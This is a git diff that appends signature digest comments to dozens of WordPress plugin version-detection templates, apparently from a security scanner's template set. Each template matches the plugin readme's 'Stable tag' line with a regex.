--- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205c427b9c3939c515096be72afaaf9a1bb6aa451fa641529419f47018a98dfb3b0220088c486de409f09c0bb72dd191d70876a1007e621deea1879d8c5cea5dd47da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..7d9a563426 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055167a4952b446bd4ba9899ab99f5fe97ac5e51aaaf3e55e3f75cb56d553d060022100db5ce6ae51fb91312c6883e22c7ec30afead4e78ca3ab5b21df068feab63fe2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..13dd810775 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220496de10405a0db113532f3d38bd887bff5db44564c1494a40110c524efbb99bb02210090fe841815a9e4b0c0870456b1becdab228a33aa4be1ceb2cfa110025dec9d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..dbddf2eac3 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aac671d7d62179e9b1e70fbd093d3ad49db413c58b2f4d34152369a13de11147022100ec441de9a725d2bd33b3f2a874ccd4ea2af518900d4eb2be8d9d4c0f71f1f329:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..d6c25e4ff8 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220745ed563fe521d4eeedc545e875d845e6467b9a85c49e5be51ebd2a9e7e29b4b022100e95e3af8eb6e19b2d3d5d027db3f566afa6ff99aeb49f8d7ff48992c2f835fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..dad4fa9b3d 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e67d212a822bccc9740598b651aa881cc49b611c8b7d740949b483473012d0b902205f6c5638d46e97269998abdf9de486b9da95cc721d97a5103c3640602d537c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..9ea0853a4a 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ade837a2f3b88b7de41ea5ce0eea7256f4b35c5588b315178141cddbf57fa69c022100b1b5aa593eaefce2f91278c98317767034cb7dfce8dfd7c25bba416fb90456c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..9265308b5f 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acbe2cbe25bdf13749038ecfddc98b17a98f998bbb66b4edd284ab0eba1b0e57022100f5b3fd64f2aff2a56ac73dd695bf90ae72fd8a0931e7bc29863d12f49b689036:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..c0c0d48d0a 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd907d410b26cefd45717af54f6c625d1aa683faa8f5d8fac0bfb7301ad548ac022100e5a888a9abd6da453b9bfab71d387bd79328058af66870e82c95af464cef60c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..ce4f71b575 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220719a61348fbd579ca92362c3278ef78127b757ce638ec7e7554827062b5886a2022054ea2cbd60079fc4c9ddeb3589e36ca9e86f65016e4e4d62724aeb637e56addc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..bc7f8f866b 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205bdb1ad25246cd2d044bc8846d3d69adee10c837d4c2e33aebbeff6aa8e19191022013b5670de96df3a49c449ef1333aa291d8c7f82cd3fa5e9f62a7be629ccfa654:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..c98c43bd07 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009464b5fd1a3fe04276a021904c9207ea8668cdc0733a697ef7548da3e2304d45022018d81e8ee6c97f41b659bd7409503bc6d48f8cb843414d6b4e027a1831899180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..bb3504968e 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022002488cc3ac71b9f2c799b70d753639c179019cc0f53e930a6d4f88e67c13ea060220184aeef96ebe67eadaea85b10f0c816aa9642a7f6eca00f4c09062684722f4a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..2d354af44a 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc9a8ccb0d390be237a71b7d535ad33410cf771c904eac17ae38f748b2bb3723022100d55cc55bfcf476c76a7672ab83a8f91557cd8d6b2ffed10f7b534f840b67136f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..c111b5626c 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002d9397ca5f145dea67291cd0a4c8e632236b0a71f1f90aca39bce24ecc0df02022100ca0babaa6678a6fb6b2b93ea1de7d0f8293f73f3045af8f8d30146c5cfc34c72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..259c7c83f3 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202141aee50dc51b94ad7f5d9092cc612d7e99bac551f94a1f784ac4484d4fe22b02210091c019fbb4ea6d54e849dd80f482d8cd6fe0b66a517e007d2e994c56733c5636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..0b1d7a0ff8 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ad2ed0e32781170c09e2a82c68c66cfcc4c79f2289b858134626f9f70b415984022100fd29034c7caf754b51a99b86bdd0e2edaf5a4986f5d13aa0a6c4c3fcc296c681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..88a4985d05 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200444305a1fe2baa1ac4fab4e3ef981c8a9b9ca50726848936a263d96d9327f4e022100b692b29db5d3648de27e5c59d706c66c7b80003a189c550918f4f97174d22a7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..638e5ad051 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100979d0980228397c311d2c8c0a27e5de52abf31d686a41cb624322b073acde4be02205354bff9b29b68a33a166f331768335c5f93acbe1a9530310db6e8544d31bafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..e5303a1b91 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202a7508d26e81e16eab9d223173c508c02cbf4441b88184d77adbee2cacd691dd022100e23ba0e7ec2b10f1fe1648574f3102457a159cbee5d005916a4c7bbe4be4311f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..11e31ab1f9 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028ccd247749587c6719ecb82eb4aec75756de5b51a46b6a60ee8ffa327cc4f32022100dbcd7df03cb14c9c5d7fd1288a92dce30b8578a46139dffa0af2a4b09e68df90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..0022b36dda 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100831b9f0cff57e70556be5f6cf46f4aeb3df87726325cd644896993d547b4045c022013ef9edbabd6a3081ca37d49621ab07122a8e170b5e73f372d4a03aed5d682a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..0bf0756f5d 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022024d36f2264fb64fc58fe6994514ab39910f869829c55297a1a82fbb646a619f9022100dc12e8566b9cbd837e4900e1b330186de1f423dc6de42a66a5766b2d333292d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..f08c3fe26e 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c108228b8e47cdfe2aa7a62fffa645f108c6c09b0c573fb91bfbc4cc2b28cff02210099b4351ca5869edc92ddd500735b94173a661f6f8473971a440c2ba90fac3ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..224f06d205 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201fc3512356304edf9a67992875e8933f1c6b00a9beddde0d243d99a2855aaf8f022100ad34e5fce48d580522066481fa24cff452eb5bfa4a58ffc3c088470cf877095e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..93cd10409e 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022063e76a79f8fc143620f416bd5c26bde72c783656dd12b19127e6be38af97645c022013245ae5c6d3bdb00950c41f02cfc2bed54415f97360e000c2cc152b4e4dcf21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..ab7c3297a4 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a565e9d7998ffc61ca15e7c0f345e315c3e233b9abe5520fb015f25c4048ab65022067f440c607093467e4887fa8d0c7f4dc2bff001ac1fb0008b9555cc055825982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..8fed2e348b 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bf851e0af85ece003ab936f743b96c406c7261b45e47bb34161a7685aad15959022043a1dd9ef7d826f677e199684a1bb13e47b30c742a2b0f0f38d7e02af8e9c6e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..08ff0cc99d 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae97c38511927fb949570ed48097e498e2ebce040d9e5a45f647d9d377aee3520221008b4d153a784b060b3dd50a97db9029d819ea31e0f983547660414bca78764508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 3e1e79e004..4cec828370 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a73c5f1a59cb74b59cceccd00c9511c31d0bf4a0305b43accfff93ece7b48e50220503a95ae5e71d51ff004f6c0132f4d55cc72ac4b37623192aba83317db427984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..ffbbf90500 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f887e66a34da4f27623ccab64340e7869f0e85011eb661b2dbebfc4fe78c9280221008d4f66daf646d34f692ce0924ce01e20e996f8f54ec2b4404ab18179ba5096b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..58f28d68f3 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022071378baaf7b76770efaacb9e8b9e9ac249a6047cab5e5ad32802a261464ec2ea022100d9462675b64cc8e00670e4ec1ce8e4b9928186039787210b2be772756a81540e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..ac51c811c1 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205dd9e9b629534fddee75b2fd8c2f3f2378b75ca79051f0d7a46e8add7d0aaeef022100f4bb4c3828b1efc8ada82fd5e1b7c1bf199fd6ff221ac8659c9a6c60be8be932:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..0b9524f885 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a92b80433a58ae33714b6fe4ad5402ec94586fd380449a1807ad65359e17672902204bc0dd14e07a4f1b9b4ece866c14815177b309c0be195098d2f9230634469b22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..7a043bba9a 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008ff0b597bec59e35ce59e65eb37078332dd823db3ce0243a53d71346b33e84a902210085051fe18b81ec25e7114102972a0f507b0da5342b8b64539b382c938b6f2a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..842644173e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202107ef3aaffb984f291bc63b48e25a7530fce99e6ca02fd8c7f41682fc9857e4022071d0a342c141cbb31fae79cf9ea750f2ca17635aa651d289f49ba683409b8a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..d6532322b9 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050bc3b1539d409a928abe9cccb89bcaefa9ed6eb5fa0a7018f3bac08d029687802205c84afbbafe79e762827651435f2ce4f57591776cfc13dc461ab45e37bbd1286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..62cf70c307 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bfef161577003bd5cc2dda046e0268625cd34e1314826013695326f81a3abfaf022100f9b8de80729166666ff4e98a7619b605a01903bd91b9321d8d003fddd3213f46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..52af1ed2b6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082ca07b12da6b1199b0741c3ee214b03ba4c813e8b58f829cbb53fc0a31bab7902210081b77427f9e4d998323afac300220e6b6350c05952e70095db865e2c79d67503:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..ae856c83d2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f6586d080d871d5c08bdad51a337989d6237099496009c5d9f8a123f9259682602207e0c113db6c08eb7fb2fad1d70ae5d87b49dcc86fb802642d8a30fe31360edfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..ce713e5b9b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c90dab91e5d8bf19b8ac242364264fadc7618fe83b1cf41acbcd0bb48b2094e8022050990530983836a59c43934c3fe6e0e6507baaa4f879e3199e1bc12975ea3b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..35e8e5a404 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e7f71a05271b6a903d67785eb4c1d5631f7a8412daf6f9fbc96d1671f11118b022100f75653bf6bbb8074384d64d30cb72ed5c3506463ee2ca90684d609f3452cf820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..a230987e00 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013fa41501ef935ce1178014aae3c26456f62a13d145c4219f7af3f46fc21ab19022032822fba308f3d2d7577c598c5c21e0296a01fa07e119af0c76b44eb1716085e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..79018b3941 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210081982376801c69a367b3b15dc2501a254895777a955bf5ae368045973ae2c54a022100a6f239fc9482dfc6304a037d0cf6b2337bb9796e9c672abd57f4d0348d7b77ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..b2dc699440 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8ae007efe5721c4e3f9041c0213527224342341bd64b3e088d1a9ca3b24ea7f022100c6faaff7db088067079f9950ef5c7b13dbee3e5b51a8b6b5456a925995a459c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..9583141ee9 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022076eed2484961d49e2d7f4d7f5d10b1dd5993557f50269b41da1dcdb25fee7b780220432217f72d77eb0d89567dbb499bff5c5df9c3cb7dfde7c4d36bd720f86e8a25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..dc1b3fb6c2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 